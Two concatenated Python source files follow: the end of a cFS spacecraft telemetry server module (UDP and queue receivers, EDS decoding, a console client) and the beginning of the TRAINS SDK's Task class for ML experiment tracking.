    def join_app_msg(self, app_name, tlm_msg_name):
        """Build the 'app_name-tlm_msg_name' key used by lookup_appid."""
        return app_name+'-'+tlm_msg_name

    def parse_topic(self, topic_name):
        """
        Assumes the following syntax for a telemetry topic: APP_NAME/Application/TLM_NAME
        Returns the (app_name, tlm_msg_name) pair.
        """
        topic_token = topic_name.split('/')
        return (topic_token[0], topic_token[2])

    def get_tlm_msg_from_topic(self,topic_name):
        """Return the TelemetryMessage for *topic_name*, or None if unknown."""
        app_name, tlm_msg_name = self.parse_topic(topic_name)
        app_id = self.get_app_id(app_name, tlm_msg_name)
        tlm_msg = None
        if app_id in self.tlm_messages:
            tlm_msg = self.tlm_messages[app_id]
        return tlm_msg

    def add_tlm_messages(self, tlm_msg_dict):
        """Merge externally created TelemetryMessage objects, keyed by app_id."""
        for msg in tlm_msg_dict:
            self.tlm_messages[tlm_msg_dict[msg].app_id] = tlm_msg_dict[msg]

    def add_msg_observer(self, tlm_msg: TelemetryMessage, tlm_msg_observer: TelemetryObserver):
        """Attach *tlm_msg_observer* to the server's copy of *tlm_msg*."""
        if tlm_msg.app_id in self.tlm_messages:
            self.tlm_messages[tlm_msg.app_id].attach(tlm_msg_observer)
        else:
            print("Failed to attach telemetry observer. App ID %d is not in the telemetry server database" % tlm_msg.app_id)

    def remove_msg_observer(self, tlm_msg: TelemetryMessage, tlm_msg_observer: TelemetryObserver):
        """Detach *tlm_msg_observer* from the server's copy of *tlm_msg*."""
        if tlm_msg.app_id in self.tlm_messages:
            self.tlm_messages[tlm_msg.app_id].detach(tlm_msg_observer)
        else:
            print("Failed to detach telemetry observer. App ID %d is not in the telemetry server database" % tlm_msg.app_id)

    def get_app_id(self, app_name, tlm_msg_name):
        """
        Return the app ID for the named telemetry message, or -1 if unknown.
        #todo: Define a global invalid app ID value
        #todo: Where should XML dependencies be defined?
        #todo: Can self.lookup_appid replace this?
        """
        topic_name = app_name.upper() + '/Application/' + tlm_msg_name.upper()
        app_id = -1
        if topic_name in self.topic_dict:
            app_id = self.topic_dict[topic_name] + 3  #todo: Clueless on the '+3' but that's what gets generated during runtime
        return app_id

    def add_server_observer(self, server_observer):
        """Install the callable invoked for every raw datagram received."""
        self.server_observer = server_observer

    @abstractmethod
    def _recv_tlm_handler(self):
        # If this handler is part of a GUI then a time.sleep() is needed to prevent updates from
        # being sent before the GUI is fully initialized
        raise NotImplementedError

    def execute(self):
        """Run the receive handler in a thread and block until it finishes."""
        self._recv_tlm_thread = threading.Thread(target=self._recv_tlm_handler)
        # 'kill' is polled by the handler as its shutdown flag.
        self._recv_tlm_thread.kill = False
        self._recv_tlm_thread.start()
        self._recv_tlm_thread.join()

    def shutdown(self):
        """Signal the receive thread to stop."""
        self._recv_tlm_thread.kill = True
        logger.info("Telemetry Server shutting down")
###############################################################################
class TelemetrySocketServer(TelemetryServer):
    """
    Manage a socket-based telemetry server: receives CCSDS telemetry
    datagrams on a UDP socket, decodes them through the EDS database and
    routes them to the matching TelemetryMessage.
    """

    def __init__(self, mission, target, host_addr, recv_tlm_port, recv_tlm_timeout):
        """
        host_addr / recv_tlm_port - UDP address to bind in execute()
        recv_tlm_timeout - socket timeout (seconds) so the receive loop can
                           poll its kill flag
        """
        super().__init__(mission, target)
        self.host_addr = host_addr
        self.recv_tlm_port = recv_tlm_port
        self.recv_tlm_socket_addr = (self.host_addr, self.recv_tlm_port)
        self.recv_tlm_timeout = recv_tlm_timeout
        self.recv_tlm_socket = None
        # NOTE(review): this socket is discarded and recreated in execute();
        # the early creation only surfaces socket errors at construction time.
        try:
            self.recv_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        except:
            print("Error creating TelemetrySocketServer socket")
            logger.error("Error creating TelemetrySocketServer socket")
        self._recv_tlm_thread = None

    def _recv_tlm_handler(self):
        """Receive-loop thread body: ingest datagrams until kill is set."""
        print("TelemetrySocketServer started receive telemetry handler thread")
        time.sleep(2.0)  #todo: Wait for GUI to init. If cFS running an event message occurs before GUI is up it will crash the system
        # Constructor sets a timeout so the thread will terminate if no packets
        while not self._recv_tlm_thread.kill:
            try:
                datagram, host = self.recv_tlm_socket.recvfrom(4096)  #TODO: Allow configurable buffer size
                # Only accept datagrams with minimum length of a telemetry header
                if len(datagram) > 6:
                    # Raw-datagram callback runs before EDS decoding.
                    if self.server_observer != None:
                        self.server_observer(datagram, host)
                    try:
                        eds_entry, eds_obj = self.eds_mission.decode_message(datagram)
                        #self.eds_objects[eds_entry.Name] = eds_obj
                        app_id = int(eds_obj.CCSDS.AppId)
                        logger.debug("Msg name: %s, Msg Id: %d " % (eds_entry.Name,app_id))
                        if app_id in self.tlm_messages:
                            logger.debug("Calling tlm message update()...")
                            self.tlm_messages[app_id].update(eds_entry, eds_obj)
                    except RuntimeError:
                        logger.error("EDS datagram decode exception. Datagram = \n %s\n", str(datagram))
                        logger.error(traceback.print_exc())
            except socket.timeout:
                # Timeout is expected; it lets the loop re-check the kill flag.
                pass
                #print('Ignored socket error...')
                #time.sleep(0.5)
        logger.info("TelemetrySocketServer terminating receive telemetry handler thread")

    def execute(self):
        """Bind the UDP socket and start the receive thread (non-blocking,
        unlike the base class execute which joins the thread)."""
        print("Starting telemetry server for " + str(self.recv_tlm_socket_addr))
        self.recv_tlm_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.recv_tlm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.recv_tlm_socket.bind(self.recv_tlm_socket_addr)
        self.recv_tlm_socket.setblocking(False)
        self.recv_tlm_socket.settimeout(self.recv_tlm_timeout)
        self._recv_tlm_thread = threading.Thread(target=self._recv_tlm_handler)
        self._recv_tlm_thread.kill = False
        self._recv_tlm_thread.start()

    def shutdown(self):
        """Signal the receive thread to stop."""
        self._recv_tlm_thread.kill = True
        logger.info("TelemetrySocketServer shutting down")
###############################################################################
class TelemetryQueueServer(TelemetryServer):
    """
    Manage a queue-based telemetry server: datagrams arrive on a router queue
    instead of a socket, but are decoded and dispatched exactly like in
    TelemetrySocketServer.
    """
    def __init__(self, mission, target, tlm_router_queue):
        """
        :param mission: mission EDS name, passed through to TelemetryServer
        :param target: target name, passed through to TelemetryServer
        :param tlm_router_queue: queue yielding (datagram, host) tuples
        """
        super().__init__(mission, target)
        self.tlm_router_queue = tlm_router_queue
        self._recv_tlm_thread = None
    def _recv_tlm_handler(self):
        """Thread body: drain the router queue until the kill flag is set."""
        logger.info("TelemetryQueueServer started receive telemetry handler thread")
        time.sleep(1.0) #todo: Wait for GUI to init. If cFS running an event message occurs before GUI is up it will crash the system
        while not self._recv_tlm_thread.kill:
            # NOTE(review): the empty()/get() pair is only safe with a single
            # consumer thread draining this queue -- confirm that assumption.
            while not self.tlm_router_queue.empty():
                datagram, host = self.tlm_router_queue.get()
                # Only accept datagrams with minimum length of a telemetry header
                if len(datagram) > 6:
                    if self.server_observer is not None:
                        self.server_observer(datagram, host)
                    try:
                        eds_entry, eds_obj = self.eds_mission.decode_message(datagram)
                        app_id = int(eds_obj.CCSDS.AppId)
                        logger.debug("Msg name: %s, Msg Id: %d " % (eds_entry.Name,app_id))
                        if app_id in self.tlm_messages:
                            logger.debug("Calling tlm message update()...")
                            self.tlm_messages[app_id].update(eds_entry, eds_obj)
                    except RuntimeError:
                        logger.error("EDS datagram decode exception. Datagram = \n %s\n", str(datagram))
                        logger.error(traceback.print_exc())
            # Idle poll interval while the queue is empty.
            time.sleep(0.5)
        logger.info("TelemetryQueueServer terminating receive telemetry handler thread")
    def execute(self):
        """Start the receive thread (non-blocking)."""
        self._recv_tlm_thread = threading.Thread(target=self._recv_tlm_handler)
        self._recv_tlm_thread.kill = False
        self._recv_tlm_thread.start()
    def shutdown(self):
        """Signal the receive thread to exit after its current sleep."""
        self._recv_tlm_thread.kill = True
        logger.info("TelemetryQueueServer shutting down")
###############################################################################
class TelemetryCmdLineClient(TelemetryObserver):
    """
    Command-line telemetry observer that prints decoded telemetry to stdout.
    Helpful for informal verification of a system configuration.
    """
    def __init__(self, tlm_server: TelemetryServer, monitor_server = False):
        """
        :param tlm_server: telemetry server to observe
        :param monitor_server: when True, also dump every raw datagram the
            server receives (via process_datagram)
        """
        super().__init__(tlm_server)
        if monitor_server:
            self.tlm_server.add_server_observer(self.process_datagram)
        # Observe every telemetry message the server knows about.
        for msg in self.tlm_server.tlm_messages:
            self.tlm_server.add_msg_observer(self.tlm_server.tlm_messages[msg], self)
    def display_entries(self, base_object, base_name):
        """
        Recursive function that iterates over an EDS object and prints the contents of
        the sub-entries to the screen
        Inputs:
        base_object - The EDS object to iterate over
        base_name - The base name for the sub-entries printed to the screen
        """
        # Array display string
        if (self.tlm_server.eds_mission.lib_db.IsArray(base_object)):
            #print("@DEBUG@display_entries()-array: base_object = " + str(base_object))
            #print("@DEBUG@display_entries()-array: base_name = " + str(base_name))
            for i in range(len(base_object)):
                self.display_entries(base_object[i], f"{base_name}[{i}]")
        # Container display string
        elif (self.tlm_server.eds_mission.lib_db.IsContainer(base_object)):
            #print("@DEBUG@display_entries()-container: base_object = " + str(base_object))
            #print("@DEBUG@display_entries()-container: base_name = " + str(base_name))
            for item in base_object:
                self.display_entries(item[1], f"{base_name}.{item[0]}")
        # Everything else (number, enumeration, string, etc.)
        else:
            print('{:<60} = {}'.format(base_name, base_object))
    def process_datagram(self, datagram, host):
        # Server-observer callback: dump the raw datagram, then decode and
        # display its entries.
        print(f"Telemetry Packet From: {host[0]}:UDP {host[1]}, {8*len(datagram)} bits :")
        print(hex_string(datagram.hex(), 16))
        eds_entry, eds_object = self.tlm_server.eds_mission.decode_message(datagram)
        self.display_entries(eds_object, eds_entry.Name)
        print("\n")
    def update(self, tlm_msg: TelemetryMessage) -> None:
        """
        Receive telemetry updates
        """
        print("Received telemetry message app ID %d at time %d" % (tlm_msg.app_id, tlm_msg.sec_hdr().Seconds))
    def reverse_eng(self):
        """
        Development scratchpad: decode a captured CFE_ES housekeeping packet
        and dump the EDS entry/object internals, for reverse engineering the
        EDS bindings. Not used in normal operation.
        """
        # Raw bytes of a captured CFE_ES housekeeping telemetry packet.
        CFE_ES_HK = [
        0x08, 0x40, 0xD7, 0xC2, 0x00, 0x96, 0x00, 0x10, 0x38, 0x3F, 0x00, 0x1E, 0x00, 0x00, 0xD2, 0x46,
        0x06, 0x07, 0x63, 0x00, 0x05, 0x00, 0x00, 0xFF, 0x01, 0x04, 0x00, 0x63, 0x00, 0x00, 0x0C, 0x00,
        0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x4E, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
        0x03, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00,
        0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
        0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
        eds_entry, eds_obj = self.tlm_server.eds_mission.decode_message(bytes(CFE_ES_HK))
        print("@REVERSE: eds_entry type %s, value: %s" % (str(type(eds_entry)), str(eds_entry)))
        print("@REVERSE: eds_obj type %s, value: %s" % (str(type(eds_obj)), str(eds_obj)))
        self.display_entries(eds_obj, eds_entry.Name)
        eds_entry = self.tlm_server.eds_mission.get_database_named_entry('CFE_ES/HousekeepingTlm')
        print("@REVERSE: eds_entry type: %s\n@@dir: %s\n@@value: %s" % (str(type(eds_entry)), str(dir(eds_entry)), str(eds_entry)))
        eds_obj = eds_entry()
        print("@REVERSE: eds_obj type: %s\n@@dir: %s\n@@value: %s" % (str(type(eds_obj)), str(dir(eds_obj)), str(eds_obj)))
        pri_hdr = eds_obj.CCSDS
        print("@REVERSE: pri_hdr type: %s\n@@dir: %s\n@@value: %s" % (str(type(pri_hdr)), str(dir(pri_hdr)), str(pri_hdr)))
        sec_hdr = eds_obj.Sec
        print("@REVERSE: sec_hdr type: %s\n@@dir: %s\n@@value: %s" % (str(type(sec_hdr)), str(dir(sec_hdr)), str(sec_hdr)))
        payload = eds_obj.Payload
        print("@REVERSE: payload type: %s\n@@dir: %s\n@@value: %s" % (str(type(payload)), str(dir(payload)), str(payload)))
###############################################################################
def main():
    """
    Entry point: read settings from cfsat.ini, build a socket telemetry server
    plus a command-line client, and start receiving telemetry.
    """
    config = configparser.ConfigParser()
    config.read('../cfsat.ini')
    mission = config.get('CFS_TARGET', 'MISSION_EDS_NAME')
    cfs_target = config.get('CFS_TARGET', 'CPU_EDS_NAME')
    host_addr = config.get('NETWORK', 'CFS_HOST_ADDR')
    tlm_port = config.getint('NETWORK', 'CFS_RECV_TLM_PORT')
    tlm_timeout = config.getint('CFS_TARGET', 'RECV_TLM_TIMEOUT')
    system_string = "Mission: %s, Target: %s, Host: %s, Telemetry Port %d" % (mission, cfs_target, host_addr, tlm_port)
    try:
        telemetry_server = TelemetrySocketServer(mission, cfs_target, host_addr, tlm_port, tlm_timeout)
        telemetry_cmd_line_client = TelemetryCmdLineClient(telemetry_server, True)
        print("Telemetry objects created for " + system_string)
    except RuntimeError:
        print("Error creating telemetry object for " + system_string)
        sys.exit(2)
    #telemetry_cmd_line_client.reverse_eng()
    telemetry_server.execute()
# Run as a script: build the telemetry server/client pair and start receiving.
if __name__ == "__main__":
    main()
|
task.py | import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from collections import OrderedDict, Callable
import psutil
import six
from .backend_api.services import tasks, projects
from .backend_api.session.session import Session
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.args import _Arguments
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message
from .config import config, PROC_MASTER_ID_ENV_VAR, DEV_TASK_NO_REUSE
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .binding.environ_bind import EnvironmentBind
from .binding.absl_bind import PatchAbsl
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import PatchSummaryToEventTransformer, PatchTensorFlowEager, \
PatchKerasModelIO, PatchTensorflowModelIO
from .utilities.resource_monitor import ResourceMonitor
from .binding.matplotlib_bind import PatchedMatplotlib
from .utilities.seed import make_deterministic
NotSet = object()
class Task(_Task):
    """
    Task (experiment) object represents the current running experiments and connects all the different parts into \
    a fully reproducible experiment
    Common usage is calling Task.init() to initialize the main task.
    The main task is development / remote execution mode-aware, and supports connecting various SDK objects
    such as Models etc. In development mode, the main task supports task reuse (see Task.init() for more
    information in development mode features).
    Any subsequent call to Task.init() will return the already-initialized main task
    and will not create a new main task.
    Sub-tasks, meaning tasks which are not the main task and are not development / remote execution mode aware, can be
    created using Task.create(). These tasks do not support task reuse and any call
    to Task.create() will always create a new task.
    You can also query existing tasks in the system by calling Task.get_task().
    **Usage: Task.init(...), Task.create() or Task.get_task(...)**
    """
    TaskTypes = _Task.TaskTypes  # re-exported from the backend task for convenience
    # Sentinel token: only the class factory methods can pass it to __init__.
    __create_protection = object()
    # The single process-wide main task, set by Task.init().
    __main_task = None
    __exit_hook = None
    # How long (hours) a previous development task id stays eligible for reuse.
    __task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
    __store_diff_on_train = config.get('development.store_uncommitted_code_diff_on_train', False)
    # When True, repository detection runs on a background thread (see _create_dev_task).
    __detect_repo_async = config.get('development.vcs_repo_detect_async', False)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
    def __init__(self, private=None, **kwargs):
        """
        **Do not construct Task manually!**
        please use Task.current_task() or Task.get_task(id=, project=, name=)

        :param private: sentinel token; must be Task.__create_protection, which
            only the class factory methods can supply
        :param kwargs: forwarded to the backend Task base class
        """
        # Refuse direct construction: only factory classmethods hold the sentinel.
        if private is not Task.__create_protection:
            raise UsageError(
                'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
        self._lock = threading.RLock()
        super(Task, self).__init__(**kwargs)
        self._arguments = _Arguments(self)  # helper connecting argparse/dict/TaskParameters
        self._logger = None  # created lazily by get_logger()
        self._last_input_model_id = None  # id of the single connected input model, if any
        self._connected_output_model = None  # saved by _save_output_model for reconnection
        self._dev_worker = None  # development-mode worker, started on demand
        self._connected_parameter_type = None  # see _try_set_connected_parameter_type
        self._detect_repo_async_thread = None  # background repo-detection thread (joined in flush)
        self._resource_monitor = None  # machine-vitals reporter, started by init()
        # register atexit, so that we mark the task as stopped
        self._at_exit_called = False
        self.__register_at_exit(self._at_exit)
@classmethod
def current_task(cls):
"""
Return the Current Task object for the main execution task (task context).
:return: Task() object or None
"""
return cls.__main_task
    @classmethod
    def init(
        cls,
        project_name=None,
        task_name=None,
        task_type=TaskTypes.training,
        reuse_last_task_id=True,
        output_uri=None,
        auto_connect_arg_parser=True,
        auto_connect_frameworks=True,
        auto_resource_monitoring=True,
    ):
        """
        Return the Task object for the main execution task (task context).
        :param project_name: project to create the task in (if project doesn't exist, it will be created)
        :param task_name: task name to be created (in development mode, not when running remotely)
        :param task_type: task type to be created (in development mode, not when running remotely)
        :param reuse_last_task_id: start with the previously used task id (stored in the data cache folder). \
            if False every time we call the function we create a new task with the same name \
            Notice! The reused task will be reset. (when running remotely, the usual behaviour applies) \
            Note: A closed or published task will not be reused, and a new task will be created.
        :param output_uri: Default location for output models (currently support folder/S3/GS/ ).
            notice: sub-folders (task_id) is created in the destination folder for all outputs.
        :param auto_connect_arg_parser: Automatically grab the ArgParser and connect it with the task.
            if set to false, you can manually connect the ArgParser with task.connect(parser)
        :param auto_connect_frameworks: If true automatically patch MatplotLib, Keras callbacks, and TensorBoard/X to
            serialize plots, graphs and model location to trains backend (in addition to original output destination)
        :param auto_resource_monitoring: If true, machine vitals will be sent along side the task scalars,
            Resources graphs will appear under the title ':resource monitor:' in the scalars tab.
        :return: Task() object
        """
        def verify_defaults_match():
            # Guard against Task.init() being called twice with conflicting arguments.
            validate = [
                ('project name', project_name, cls.__main_task.get_project_name()),
                ('task name', task_name, cls.__main_task.name),
                ('task type', str(task_type), str(cls.__main_task.task_type)),
            ]
            for field, default, current in validate:
                if default is not None and default != current:
                    raise UsageError(
                        "Current task already created "
                        "and requested {field} '{default}' does not match current {field} '{current}'".format(
                            field=field,
                            default=default,
                            current=current,
                        )
                    )
        # A main task already exists: validate the arguments and return it.
        if cls.__main_task is not None:
            if not running_remotely():
                verify_defaults_match()
            return cls.__main_task
        # check that we are not a child process, in that case do nothing
        if PROC_MASTER_ID_ENV_VAR.get() and PROC_MASTER_ID_ENV_VAR.get() != os.getpid():
            # Child processes get a no-op stub that absorbs any call/attribute access.
            class _TaskStub(object):
                def __call__(self, *args, **kwargs):
                    return self
                def __getattr__(self, attr):
                    return self
                def __setattr__(self, attr, val):
                    pass
            return _TaskStub()
        # set us as master process
        PROC_MASTER_ID_ENV_VAR.set(os.getpid())
        if task_type is None:
            # Backwards compatibility: if called from Task.current_task and task_type
            # was not specified, keep legacy default value of TaskTypes.training
            task_type = cls.TaskTypes.training
        try:
            if not running_remotely():
                # Development mode: create (or reuse) a dev task.
                task = cls._create_dev_task(
                    project_name,
                    task_name,
                    task_type,
                    reuse_last_task_id,
                )
                if output_uri:
                    task.output_uri = output_uri
            else:
                # Remote execution: attach to the task id provided by the agent.
                task = cls(
                    private=cls.__create_protection,
                    task_id=get_remote_task_id(),
                    log_to_backend=False,
                )
        except Exception:
            raise
        else:
            Task.__main_task = task
            # Patch argparse to be aware of the current task
            argparser_update_currenttask(Task.__main_task)
            EnvironmentBind.update_current_task(Task.__main_task)
            if auto_connect_frameworks:
                PatchedMatplotlib.update_current_task(Task.__main_task)
                PatchAbsl.update_current_task(Task.__main_task)
                PatchSummaryToEventTransformer.update_current_task(task)
                # PatchModelCheckPointCallback.update_current_task(task)
                PatchTensorFlowEager.update_current_task(task)
                PatchKerasModelIO.update_current_task(task)
                PatchTensorflowModelIO.update_current_task(task)
                PatchPyTorchModelIO.update_current_task(task)
            if auto_resource_monitoring:
                task._resource_monitor = ResourceMonitor(task)
                task._resource_monitor.start()
            # Check if parse args already called. If so, sync task parameters with parser
            # NOTE(review): this runs regardless of auto_connect_arg_parser and is
            # repeated below when that flag is set -- looks redundant; confirm intent.
            if argparser_parseargs_called():
                parser, parsed_args = get_argparser_last_args()
                task._connect_argparse(parser=parser, parsed_args=parsed_args)
        # make sure all random generators are initialized with new seed
        make_deterministic(task.get_random_seed())
        if auto_connect_arg_parser:
            # Patch ArgParser to be aware of the current task
            argparser_update_currenttask(Task.__main_task)
            # Check if parse args already called. If so, sync task parameters with parser
            if argparser_parseargs_called():
                parser, parsed_args = get_argparser_last_args()
                task._connect_argparse(parser, parsed_args=parsed_args)
        # Make sure we start the logger, it will patch the main logging object and pipe all output
        # if we are running locally and using development mode worker, we will pipe all stdout to logger.
        # The logger will automatically take care of all patching (we just need to make sure to initialize it)
        task.get_logger()
        # Make sure we start the dev worker if required, otherwise it will only be started when we write
        # something to the log.
        task._dev_mode_task_start()
        return task
@classmethod
def create(
cls,
task_name=None,
project_name=None,
task_type=TaskTypes.training,
):
"""
Create a new Task object, regardless of the main execution task (Task.init).
Notice: This function will always create a new task, whether running in development or remote execution mode.
:param task_name: task name to be created
:param project_name: Project to create the task in.
If project is None, and the main execution task is initialized (Task.init), its project will be used.
If project is provided but doesn't exist, it will be created.
:param task_type: Task type to be created. (default: "training")
Optional Task types are: "training" / "testing" / "dataset_import" / "annotation" / "annotation_manual"
:return: Task() object
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
    @classmethod
    def _create_dev_task(cls, default_project_name, default_task_name, default_task_type, reuse_last_task_id):
        """
        Create (or reuse) the development-mode main task.

        Defaults missing project/task names from the detected repository and
        entry point, tries to reuse the last session's task id when allowed,
        otherwise creates a fresh task; finally updates the repository info and
        prints the results-page URL.
        """
        if not default_project_name or not default_task_name:
            # get project name and task name from repository name and entry_point
            result = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
            if result:
                if not default_project_name:
                    # noinspection PyBroadException
                    try:
                        parts = result.script['repository'].split('/')
                        default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
                    except Exception:
                        default_project_name = 'Untitled'
                if not default_task_name:
                    # noinspection PyBroadException
                    try:
                        default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
                    except Exception:
                        pass
        # if we force no task reuse from os environment
        if DEV_TASK_NO_REUSE.get():
            default_task = None
        else:
            # if we have a previous session to use, get the task id from it
            default_task = cls.__get_last_used_task_id(
                default_project_name,
                default_task_name,
                default_task_type.value,
            )
        closed_old_task = False
        default_task_id = None
        in_dev_mode = not running_remotely()
        if in_dev_mode:
            if not reuse_last_task_id or not cls.__task_is_relevant(default_task):
                default_task_id = None
                closed_old_task = cls.__close_timed_out_task(default_task)
            else:
                default_task_id = default_task.get('id') if default_task else None
            if default_task_id:
                try:
                    task = cls(
                        private=cls.__create_protection,
                        task_id=default_task_id,
                        log_to_backend=True,
                    )
                    if ((task.status in (tasks.TaskStatusEnum.published, tasks.TaskStatusEnum.closed))
                            or (ARCHIVED_TAG in task.data.tags) or task.output_model_id):
                        # If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
                        # If the task is archived, or already has an output model,
                        # we shouldn't use it in development mode either
                        default_task_id = None
                        task = None
                    else:
                        # reset the task, so we can update it
                        task.reset(set_started_on_success=False, force=False)
                        # set development tags
                        task.set_tags([cls._development_tag])
                        # clear task parameters, they are not cleared by the Task reset
                        task.set_parameters({}, __update=False)
                        # clear the comment, it is not cleared on reset
                        task.set_comment(make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
                        # clear the input model (and task model design/labels)
                        task.set_input_model(model_id='', update_task_design=False, update_task_labels=False)
                        task.set_model_config(config_text='')
                        task.set_model_label_enumeration({})
                except (Exception, ValueError):
                    # we failed reusing task, create a new one
                    default_task_id = None
        # create a new task
        if not default_task_id:
            task = cls(
                private=cls.__create_protection,
                project_name=default_project_name,
                task_name=default_task_name,
                task_type=default_task_type,
                log_to_backend=True,
            )
        if in_dev_mode:
            # update this session, for later use
            cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
            # force update of base logger to this current task (this is the main logger task)
            task._setup_log(replace_existing=True)
        logger = task.get_logger()
        if closed_old_task:
            logger.console('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
        # print warning, reusing/creating a task
        if default_task_id:
            logger.console('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
        else:
            logger.console('TRAINS Task: created new task id=%s' % task.id)
        # update current repository and put warning into logs
        if in_dev_mode and cls.__detect_repo_async:
            task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
            task._detect_repo_async_thread.daemon = True
            task._detect_repo_async_thread.start()
        else:
            task._update_repository()
        # show the debug metrics page in the log, it is very convenient
        logger.console(
            'TRAINS results page: {}/projects/{}/experiments/{}/output/log'.format(
                task._get_app_server(),
                task.project if task.project is not None else '*',
                task.id,
            ),
        )
        # make sure everything is in sync
        task.reload()
        # make sure we see something in the UI
        thread = threading.Thread(target=LoggerRoot.flush)
        thread.daemon = True
        thread.start()
        return task
    @staticmethod
    def get_task(task_id=None, project_name=None, task_name=None):
        """
        Return a Task object based on either task_id (system uuid) or project/task name.
        :param task_id: unique task id string (if provided, the other parameters are ignored)
        :param project_name: project name (str) the task belongs to
        :param task_name: task name (str) within the selected project
        :return: Task object
        """
        return Task.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
    @property
    def output_uri(self):
        """Default output location for models (folder / S3 / GS URI); alias of storage_uri."""
        return self.storage_uri
    @output_uri.setter
    def output_uri(self, value):
        """Set the default output location for models; stored as storage_uri."""
        self.storage_uri = value
def set_comment(self, comment):
"""
Set a comment text to the task.
In remote, this is a no-op.
:param comment: The comment of the task
:type comment: str
"""
if not running_remotely() or not self.is_main_task():
self._edit(comment=comment)
self.reload()
def add_tags(self, tags):
"""
Add tags to this task. Old tags are not deleted
In remote, this is a no-op.
:param tags: An iterable or space separated string of new tags (string) to add.
:type tags: str or iterable of str
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
"""
Connect an object to a task (see introduction to Task connect design)
:param mutable: can be any object Task supports integrating with:
- argparse : for argument passing
- dict : for argument passing
- TaskParameters : for argument passing
- model : for initial model warmup or model update/snapshot uploads
:return: connect_task() return value if supported
:raise: raise exception on unsupported objects
"""
dispatch = OrderedDict((
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
))
for mutable_type, method in dispatch.items():
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
    def get_logger(self, flush_period=NotSet):
        """
        get a logger object for reporting based on the task
        :param flush_period: The period of the logger flush.
            If None of any other False value, will not flush periodically.
            If a logger was created before, this will be the new period and
            the old one will be discarded.
        :return: .Logger object
        """
        if not self._logger:
            # force update of base logger to this current task (this is the main logger task)
            self._setup_log(replace_existing=self.is_main_task())
            # Get a logger object
            self._logger = Logger(private_task=self)
            # make sure we set our reported to async mode
            # we make sure we flush it in self._at_exit
            self.reporter.async_enable = True
            # if we just created the logger, set default flush period
            # NOTE(review): at first creation any falsy flush_period (including an
            # explicit None) is replaced by the default period, which contradicts
            # the docstring's "will not flush periodically" -- confirm intent.
            if not flush_period or flush_period is NotSet:
                flush_period = DevWorker.report_period
        if isinstance(flush_period, (int, float)):
            flush_period = int(abs(flush_period))
        # Only apply valid values: None (disable) or a non-negative int period.
        if flush_period is None or isinstance(flush_period, int):
            self._logger.set_flush_period(flush_period)
        return self._logger
def mark_started(self):
"""
Manually Mark the task as started (will happen automatically)
"""
# UI won't let us see metrics if we're not started
self.started()
self.reload()
def mark_stopped(self):
"""
Manually Mark the task as stopped (also used in self._at_exit)
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
